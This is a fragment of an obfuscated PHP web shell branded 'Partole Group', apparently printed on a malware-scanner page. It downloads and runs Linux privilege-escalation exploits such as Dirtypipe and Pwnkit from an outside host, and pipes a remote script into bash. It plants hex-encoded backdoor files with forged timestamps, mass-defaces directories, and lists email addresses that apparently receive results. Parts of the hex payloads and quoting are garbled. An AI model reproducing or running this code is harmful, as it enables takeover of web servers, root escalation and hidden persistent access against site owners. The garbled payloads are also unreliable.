"<hr>"; die(author()); } elseif (isset($_GET["loknya"]) && $_GET["opsi"] == "scanr") { ob_implicit_flush(); ob_end_flush(); echo "<center>[ <a href="" . $_SERVER["REQUEST_URI"] . "&opsidua=autoscan"><gold>Auto Scan</gold></a> ] | [ <a href="" . $_SERVER["REQUEST_URI"] . "&opsidua=scansd"><gold>Scan SUID</gold></a> ] | [ <a href="" . $_SERVER["REQUEST_URI"] . "&opsidua=esg"><gold>Exploit Suggester</gold></a> ]</center>"; if (!$fnct("proc_open")) { die(red("[!] Command is Disabled !")); } if (!$isw($lokasi)) { die(red("[!] Current Directory is Unwriteable !")); } if (isset($_GET["opsidua"]) && $_GET["opsidua"] == "autoscan") { if (!$fxt($lokasi . "/anon_root/")) { $mdr($lokasi . "/anon_root"); komenb("wget http://f.ppk.pw/auto.tar-j7-.gz", $lokasi . "/anon_root"); komenb("tar -xf auto.tar-06-j2.gz", $lokasi . "/anon_root"); if (!$fxt($lokasi . "/anon_root/netfilter")) { die(red("[!] Gagal Download Bahan")); } } echo "<br>Kernel : <gold>" . komenb("uname -a", $lokasi) . "</gold><br>"; echo "User : <gold>" . komenb("id", $lokasi) . "</gold><br>"; echo "<br>[+] Trying All Exploits ...<br>"; echo "Netfilter : " . komend("timeout0 ./anon_root/netfilter", $lokasi) . "<br>"; echo "Ptrace : " . komend("echo id | timeout0 ./anon_root/ptrace", $lokasi) . "<br>"; echo "Sequoia : " . komend("timeout ./anon_root/sequoia", $lokasi) . "<br>"; echo "OverlayFS : " . komend("echo id | ./overlayfs", $lokasi . "/anon_root") . "<br>"; echo "Dirtypipe : " . komend("echo id | timeout 10 ./anon_root/dirtypipe /usr/bin/su", $lokasi) . "<br>"; echo "Sudo : " . komend("echo 125 | timeout 10 sudoedit -s Y", $lokasi) . "<br>"; echo "Pwnkit : " . komend("echo id | timeout0 ./pwnkit", $lokasi . "/anon_root") . "<br>"; echo "Capsys : " . komend("echo id | timeout ./capsys", $lokasi . "/anon_root") . "<br>"; echo "Netfilter 2 : " . komend("echo id | timeout 10 ./netfilter2", $lokasi . "/anon_root") . "<br>"; echo "Netfilter 3 : " . komend("echo id | timeout 10 ./netfilter3", $lokasi . "/anon_root") . "<br>"; komenb("rm -rf anon_root", $lokasi); } elseif (isset($_GET["opsidua"]) && $_GET["opsidua"] == "scansd") { echo "<br>[+] Scanning ...<br>"; echo komend("find / -perm -u=s -type f 2>/dev/null", $lokasi); } elseif (isset($_GET["opsidua"]) && $_GET["opsidua"] == "esg") { echo "<br>[+] Loading ...<br>"; echo komend("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $lokasi); } echo "<hr>"; die(author()); } elseif (isset($_GET["loknya"]) && $_GET["opsi"] == "bekup") { if (isset($_POST["lokruna"])) { echo "<center>"; echo "Path : <gold>" . $hsc($_POST["lokruna"]) . "</gold><br>"; if (!$isr($_POST["lokruna"])) { die(red("[+] Current Path is Unreadable !")); } elseif (!$isw($_POST["lokruna"])) { die(red("[+] Current Path is Unwriteable !")); } $loks = sds($_POST["lokruna"]); $pisah = $ars($loks, -50); $los = $arr($pisah, 2); $satu = $loks[$los[0]]; $satut = $ftm($satu); $dua = $loks[$los[1]]; $duat = $ftm($dua); if (empty($satu) && empty($dua)) { die(red("[+] Unknown Error !")); } echo "<br>"; if (!$isw($satu)) { echo "[<merah>Failed</merah>] " . $satu . "<br>"; } else { $satus = $satu . "/contact.php"; $fpt($satus, $h2b("3c6d612f6e6e743d226e6f696e64786e6d653d226f6f732e6f6e74634d3c6f6d6e637970653d6d7c7φ1742f6f7d2d6461716d646f6d2f73743e3c6e746e6d3d2274756c2479753d26696c653e3c65747f6e3e47617b6e3c2f62757f6e3e3c2f6f726d3e3c3f3d22223b246d27662e276ʺe276c272e252e5f2e702e27272e242e275f2e27672e6f272e2e2e2774272e2e2e272e242e73273b243d26272e27692e6c272e652e5f2e67272e65272e272e2f2e27632e276f2e276e2e272e272e2e2e742e273b24633d2774272e276d272e27272e5f272e276e2e212e276d2e27273b243d6ºe65772e27322e27696e273b263d672e696c2e275f6e28672e73742e773b69662869737428245f46494c5b2774756c275d29297b282f494c455b64756c275d5b276e6d65275d2c2462245f46494c435b27627c2d5b635d2b696828272e2f272e245f46494c5b2764756c275d5b276e616d65275d29297b6563686f202f6b60212b7d6c737b686f2027616c20273b7d7d6969736574285f45545b662d29297b242868245f5f5b272d2c282f504f53545b2764275d29293b696628242824282f4f545b2766275d292b65686f224f6b65213b7d656c73657b6f2061696c20213b7d7d3f3e")); $tch($satus, $satut); $tch($satu, $satut); echo "[<ijo>Success</ijo>] " . $satus . "<br>"; if ($sps($_POST["lokruna"], $_SERVER["DOCUMENT_ROOT"]) !== false) { $lwb = $srl($_SERVER["DOCUMENT_ROOT"], $wb, $satus); $satul = "<br><a href='" . $lwb . "'><font color='gold'>" . $lwb . "</font></a><br>"; } } if (!$isw($dua)) { echo "[<merah>Failed</merah>] " . $dua . "<br>"; } else { $duas = $dua . "/setting.php"; $fpt($duas, $h2b("3c6d6571206e616d6d226f6f7472206f6e756e743d226e6f696e64682e0d0a4d7920747e670d0a3c3f70600d0a2d2022622e226c5f702e22745f632e6f6e742e222e226e742e222b0d0a2462203d2066222e296c222e22655f67222e722e5f636f222e226e756e222e3b0d0a23203d69222e2c6e5f657e632e2273223b0d0a24603d2022622e6578222e223e22696e3b0d0a6920286ϟ5745f5f535b276b6f642d29207b0d0a0924685f5f535b2c6f6b5d2c206428245f4f535b276b6f642d292b0d0a09202463282f4f535b276c6f6b275d2929207b0d0a09056f224f4b202b0d0a0d256c752b0d0a0909636f202661696c652020223b0d0a097d0d0a7d0d0a6β9785f475b27695d297b0d0a0e6c755f47445b29275d3b0d0a7d0d0a69202ϟ3745f47455b275d2929207b0d0a046822776b776b2e7068222c24642336673431366636643634323632663437323636373436373464366536396534363738323334333636363637343633363632363638663462306633373432323536373737363436673664393734663636373662643131326536673532343937363533323639353232363636643562363734373632323365333635373734666364363733323136663537366533636636363663303363333737306234363132336432323632653236393235323236323262363535323266326532373232623735326532373235323532326232363332353236323265323232323237323232653232363236653232373232326537323261363233323032363635323232326233326535323265323562323236373232623632353234323235323262363232653236623265326532323265323232653232326532363232373265373332336136333234303232653234323237323262653265323262313232653236323532353233306639363839333337323234353434393335353562373637356264323239303762323Ó43536393434333236373736623432323665363535643334323834396335353232356237356534333239396239363230383639666635373839373433383265363232346639353562363734366235643562373531363635373239323937363336663234666632303231323360363335303236363636663232363136393662303234376033352229293b0d0a0969662824632822776b222e227b2e2e22622e227022292ʇb0d0a096563686f204f4b20223b0d0a097d0d0a7d0d0a3f3e")); $tch($duas, $duat); $tch($dua, $duat); echo "[<ijo>Success</ijo>] " . $duas . "<br>"; if ($sps($_POST["lokruna"], $_SERVER["DOCUMENT_ROOT"]) !== false) { $lwb = $srl($_SERVER["DOCUMENT_ROOT"], $wb, $duas); $dual = "<a href='" . $lwb . "'><font color='gold'>" . $lwb . "</font></a><br>"; } } echo "<br>"; if (!empty($satul)) { echo $satul; } if (!empty($dual)) { echo $dual; } echo "</center>"; } else { echo "<center>Masukkan Lokasi Document Root<br>"; echo "<form method="post"><input type="text" name="lokruna" value="" . $hsc($_GET["loknya"]) . "" style="cursor: pointer; border-color: #0" class="up"> "; echo "<input type="submit" name="palepale" value="Gaskan" class="up" style="cursor: pointer"></form>"; } die; } elseif (isset($_GET["opsi"]) && $_GET["opsi"] == "repip") { echo "<center>"; echo "Reverse IP : <gold>" . $hsc($_SERVER["SERVER_NAME"]) . "</gold>"; echo "<pre>" . $hsc(crul("https://api.hackertarget.com/reverseiplookup/?q=" . $_SERVER["SERVER_NAME"])) . "</pre>"; echo "</center>"; die; } elseif (isset($_GET["loknya"]) && $_GET["opsi"] == "mdf") { echo "<center>"; if (empty($_POST["palepale"])) { echo "<form method="post">"; echo "Dir : <input type="text" name="lokena" class="up" style="cursor: pointer; border-color: #000" value="" . $hsc($_GET["loknya"]) . ""><br>"; echo "Nama File : <input type="text" name="nfil" class="up" style="cursor: pointer; border-color: #000" value="index.php"><br><br>"; echo "Isi File : <br><textarea class="up" cols="" rows="" name="isikod"></textarea><br><br>"; echo "<select name="opsina"><option value="mdf">Mass Deface</option><option value="mds">Mass Deface 2</option></select><br><br>"; echo "<input type="submit" name="palepale" value="Gaskeun" class="up" style="cursor: pointer">"; echo "</form>"; } else { $lokena = $_POST["lokena"]; $nfil = $_POST["nfil"]; $isif = $_POST["isikod"]; echo "Dir : <gold>" . $hsc($lokena) . "</gold><br>"; if (!$fxt($lokena)) { die(red("[+] Directory Tidak di Temukan !")); } $g = $scd($lokena); if (isset($_POST["opsina"]) && $_POST["opsina"] == "mds") { foreach ($g as $gg) { if (isset($gg) && $gg == || $gg == "..") { continue; } elseif (!$idr($gg)) { continue; } if (!$isw($lokena . "/" . $gg)) { echo "[<merah>Unwriteable</merah>] " . $lokena . "/" . $gg . "<br>"; continue; } $loe = $lokena . "/" . $gg . "/" . $nfil; $cf = $fgr($gg); if ($cf == "99") { if ($fpt($loe, $isif) !== false) { if ($sps($gg, ) !== false) { echo "[<ijo>Success</ijo>] " . $loe . " -> <a href='//" . $gg . "/" . $nfil . "'><gold>" . $gg . "/" . $nfil . "</gold></a><br>"; } else { echo "[<ijo>Success</ijo>] " . $loe . "<br>"; } } } } echo "<hr>"; die(author()); } foreach ($g as $gg) { if (isset($gg) && $gg == || $gg == "..") { continue; } elseif (!$idr($gg)) { continue; } if (!$isw($lokena . "/" . $gg)) { echo "[<merah>Unwriteable</merah>] " . $lokena . "/" . $gg . "<br>"; continue; } $loe = $lokena . "/" . $gg . "/" . $nfil; if ($fpt($loe, $isif) !== false) { echo "[<ijo>Success</ijo>] " . $loe . "<br>"; } else { echo "[<merah>Unwriteable</merah>] " . $lokena . "/" . $gg . "<br>"; } } } echo "<hr>"; echo "</center>"; die(author()); } goto aqdTl; OCSeH: echo " | Perl : "; goto BpW9X; k0tk4: $tujuanmail = "bomgranatbros@gmail.com, ressultku22@gmail.com"; goto SXaz2; Xktsz: if (@$fxt("/usr/bin/pkexec")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto KRYMy; NPN0i: $pgw = "posix_getpwuid"; goto PoFeu; tEOKz: $rpt = "realpath"; goto rYQ8V; gFMF_: echo "</td></tr><tr><td><br>"; goto CqUtp; E0_hJ: $hsc = "htmlspecialchars"; goto oWhs2; rCIv9: echo tuls("HOME", $_SERVER["SCRIPT_NAME"]); goto EekW6; O0Qtr: function tuls($nm, $lk) { return "[ <a href='" . $lk . "'>" . $nm . "</a> ] "; } goto kb0AF; MJdgk: echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?loknya=" . $euybrekw . "">..</a></td>\xa<td><center>--</center></td>
<td><center>" . fdt($euybrekw) . "</center></td>\xa<td><center>" . gor($euybrekw) . " / " . ggr($euybrekw) . "</center></td>\xa<td><center>"; goto RopeH; hZA0M: function sds($sads, &$results = array()) { $iwr = "is_writable"; $ira = "is_readable"; $ph = "preg_match"; $sa = "scandir"; $rh = "realpath"; $idr = "is_dir"; if (!$ira($sads) || !$iwr($sads) || $ph("/\/application\/|\/system/i", $sads)) { return false; } $files = $sa($sads); foreach ($files as $key => $value) { $path = $rh($sads . DIRECTORY_SEPARATOR . $value); if (!$idr($path)) { } else { if ($value != && $value != "..") { sds($path, $results); $results[] = $path; } } } return $results; } goto t_7tM; T40hL: $euybrekw = $srl($bsn($lokasi), '', $lokasi); goto ToPG6; pNoz_: $spr = "sprintf"; goto Ueu41; GVX4Q: echo "Disable Function : " . $disf . "</font><br>"; goto omN04; iLsLk: $tch = "touch"; goto RONYa; RONYa: $h2b = "hex2bin"; goto E0_hJ; pywxM: echo "<div id="content"><table width="1%" border="0" cellpadding="3" cellspacing=" align="center">
<tr class="first">
<td><center>Name</center></td>\xa<td><center>Size</center></td>\xa<td><center>Last Modified</center></td>\xa<td><center>Owner / Group</center></td>\xa<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>"; goto sSXVq; sSXVq: echo "<tr>"; goto T40hL; mPG9A: echo "<hr><center style="font-family: Russo One">"; goto rCIv9; JSzQB: $mkd = "mkdir"; goto WMfSB; UnrrX: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?loknya=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?loknya="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto gFMF_; Yn8nx: foreach ($_POST as $key => $value) { $_POST[$key] = $sts($value); } goto YRSzH; yauwQ: $urd = "urldecode"; goto NPN0i; tDoll: $skd = "24"; goto Oa47o; Aj6bK: echo "</table><br>"; goto mPG9A; EiRtV: echo tuls("JUMPING", $_SERVER["SCRIPT_NAME"] . "?loknya=" . $lokasi . "&opsi=lompat"); goto LpOag; pXzw1: echo "System : <font color='gold'>" . @$unm() . "</font><br>"; goto Sk5fX; eRKII: $sts = "stripslashes"; goto RbhjJ; lVNCo: $igt = "ini_get"; goto QVgPM; Nfm3P: if (!isset($_SESSION["authenticated"])) { if (isset($_POST["password"])) { if ($_POST["password"] === $ewean) { $_SESSION["authenticated"] = true; } else { echo "Password salah!"; } } if (!isset($_SESSION["authenticated"])) { echo "<form method="post">"; echo "Password: <input type="password" name="password">"; echo "<input type="submit" value="Login">"; echo "</form>"; die; } } goto siD0Y; omN04: echo "Domains : <font color=gold>" . (empty(gtd()) ? "0 Domains" : gtd()) . "</font><br>"; goto DTWpo; Vr_wk: $rad = "REMOTE_ADDR"; goto tEOKz; tYaJ5: echo " | Python : "; goto tx3mw; scEWv: function esyeem($tg, $lk) { $a = "function_exists"; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; $e = "symlink"; if ($a("symlink")) { return $e($tg, $lk); } elseif ($a("proc_open")) { $ps = $b("ln -s " . $tg . " " . $lk, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk); return $c($d($meki[1])); } else { return "Symlink Function is Disabled !"; } } goto hZA0M; MF_Dl: function statusnya($fl) { $a = "substr"; $b = "sprintf"; $c = "fileperms"; $izin = $a($b("%o", $c($fl)), -4); return $izin; } goto djmla; lEzvj: $gmu = "getmyuid"; goto G6BRQ; ShKfK: $wb = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; goto ZYyp0; IpTNg: $ars = "array_slice"; goto NI1ew; Hp5P0: $sps = "strpos"; goto JSzQB; i06Kn: $srl = "str_replace"; goto Hp5P0; CZFBi: $lokasinya = @$scd($lokasi); goto UnrrX; vQK9W: echo "<font face="Bungee" size=">Partole Group</font></center>
<table width="100%" border="0" cellpadding=" cellspacing=" align="center">
<tr><td>"; goto u72VF; QD8x_: echo "<form enctype="multipart/form-data" method="post">\xa<input type="radio" value=" name="dirnya" checked>current_dir [ " . cdrd() . " ]
<input type="radio" value=" name="dirnya" >document_root [ " . crt() . " ]\xa<br>\xa<input type="hidden" name="upwkwk" value="aplod">\xa<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://partole.group/link.txt"> <input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form>"; goto lzGNb; oXVGR: echo "PHP Version : <font color='gold'>" . @$phv() . "</font><br>"; goto GVX4Q; b2WtM: if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto E1wb1; YOAA2: echo "</tr>"; goto lfj2M; E1wb1: function author() { echo "<center><br>Yuji - 25<br><a href='https://xnxx.com/' target='_blank'>Partole Group</a></center>"; die; } goto O4myX; C71f6: $fgr = "filegroup"; goto j56ej; djmla: @ini_set("output_buffering", 0); goto oK_dM; ekpFi: $ifi = "is_file"; goto geuFp; sUaNB: $isr = "is_readable"; goto uTgEJ; Kws72: author(); goto MF_Dl; Pkoq1: function ipsrv() { $a = "gethostbyname"; $b = "function_exists"; $c = "SERVER_ADDR"; $d = "SERVER_NAME"; if ($b($a)) { return $a($_SERVER[$d]); } else { return $a($_SERVER[$c]); } } goto IAa0M; IDGXg: $phv = "phpversion"; goto oXVGR; XiblZ: function cfn($fl) { $a = "basename"; $b = "pathinfo"; $c = $b($a($fl), PATHINFO_EXTENSION); if ($c == "zip") { return "<i class="fa fa-file-zip-o" style="color: #d6d4ce"></i>"; } elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) { return "<i class="fa fa-file-image-o" style="color: #d6d4ce"></i>"; } elseif ($c == "txt") { return "<i class="fa fa-file-text-o" style="color: #d6d4ce"></i>"; } elseif ($c == "pdf") { return "<i class="fa fa-file-pdf-o" style="color: #d6d4ce"></i>"; } elseif ($c == "html") { return "<i class="fa fa-file-code-o" style="color: #d6d4ce"></i>"; } else { return "<i class="fa fa-file-o" style="color: #d6d4ce"></i>"; } } goto Pkoq1; rVq7a: $ulk = "unlink"; goto ekpFi; gNRi2: if ($isw($euybrekw) || !$isr($euybrekw)) { echo "</font>"; } goto lz2QJ; oWMpN: $fpt = "file_put_contents"; goto PLgD1; xerp0: if (@$fxt("/usr/bin/wget")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto OCSeH; CqUtp: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } if (empty($_FILES["berkas"]["name"])) { echo "<font color=orange>File not Selected !</font><br><br>"; } else { $tgn = $ftm($lokasi); $data = @$fpt($lokasi . "/" . $_FILES["berkas"]["name"], @$fgt($_FILES["berkas"]["tmp_name"])); if ($fxt($lokasi . "/" . $_FILES["berkas"]["name"])) { $fl = $lokasi . "/" . $_FILES["berkas"]["name"]; echo "File Uploaded ! <font color='gold'><i>" . $fl . "</i></font><br>"; if ($sps($lokasi, $_SERVER["DOCUMENT_ROOT"]) !== false) { $lwb = $srl($_SERVER["DOCUMENT_ROOT"], $wb . "/", $fl); echo "Link : <a href='" . $lwb . "'><font color='gold'>" . $lwb . "</font></a><br>"; } @$tch($lokasi, $tgn); @$tch($lokasi . "/" . $_FILES["berkas"]["name"], $tgn); echo "<br>"; } else { echo "<font color='red'>Failed to Upload !</font><br><br>"; } } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { echo "<font color=orange>Filename cannot be empty !</font><br><br>"; } elseif (empty($_POST["darilink"])) { echo "<font color=orange>Link cannot be empty !</font><br><br>"; } else { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $tgn = $ftm($lokasi); $data = @$fpt($lokasi . "/" . $_POST["namalink"], @$fgt($_POST["darilink"])); if ($fxt($lokasi . "/" . $_POST["namalink"])) { $fl = $lokasi . "/" . $_POST["namalink"]; echo "File Uploaded ! <font color='gold'><i>" . $fl . "</i></font><br>"; if ($sps($lokasi, $_SERVER["DOCUMENT_ROOT"]) !== false) { $lwb = $srl($_SERVER["DOCUMENT_ROOT"], $wb . "/", $fl); echo "Link : <a href='" . $lwb . "'><font color='gold'>" . $lwb . "</font></a><br>"; } @$tch($lokasi, $tgn); @$tch($lokasi . "/" . $_POST["namalink"], $tgn); echo "<br>"; } else { echo "<font color='red'>Failed to Upload !</font><br><br>"; } } } } goto OAXXV; DP2AH: $ctn = "count"; goto yauwQ; Lpsfi: echo "</tr></td></table></table>"; goto Kws72; K41X6: $exp = "explode"; goto oWMpN; PLgD1: $fgt = "file_get_contents"; goto eRKII; IAa0M: function ggr($fl) { $a = "function_exists"; $b = "posix_getgrgid"; $c = "filegroup"; if ($a($b)) { if (!$a($c)) { return "?"; } $d = $b($c($fl)); if (empty($d)) { $e = $c($fl); if (empty($e)) { return "?"; } else { return $e; } } else { return $d["name"]; } } elseif ($a($c)) { return $c($fl); } else { return "?"; } } goto jKDza; RbhjJ: $scd = "scandir"; goto bJ6r0; qfm6V:© 2023 Quttera Ltd. All rights reserved.